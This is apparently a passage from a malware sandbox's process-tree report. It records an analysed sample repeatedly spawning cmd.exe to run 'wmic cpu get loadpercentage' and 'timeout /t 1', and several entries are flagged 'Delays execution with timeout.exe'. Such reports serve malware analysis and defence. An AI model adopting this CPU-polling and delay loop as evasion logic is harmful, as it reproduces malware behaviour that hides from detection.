    wmic cpu get loadpercentage
    3⤵
    PID:1624
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4328
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1336
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4492
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:812
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4324
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2696
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3152
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1976
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1080
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3164
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3636
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1624
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2040
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:68
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4328
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:992
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4576
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1420
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3132
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:60
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1260
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3860
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4856
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4324
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4772
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4572
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:312
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5028
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:968
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1412
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:988
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2068
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2248
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3088
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3608
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3736
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4788
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4100
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4248
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3712
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2820
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2792
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4152
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4716
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3152
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3040
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:908
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2232
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4660
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4452
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4288
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:988
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2804
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2112
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2956
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4220
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:808
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:68
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:424
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2008
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3712
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:644
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2792
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4352
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2696
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3152
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4212
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3424
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:660
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4088
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3320
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4244
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2432
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4704
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4332
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3876
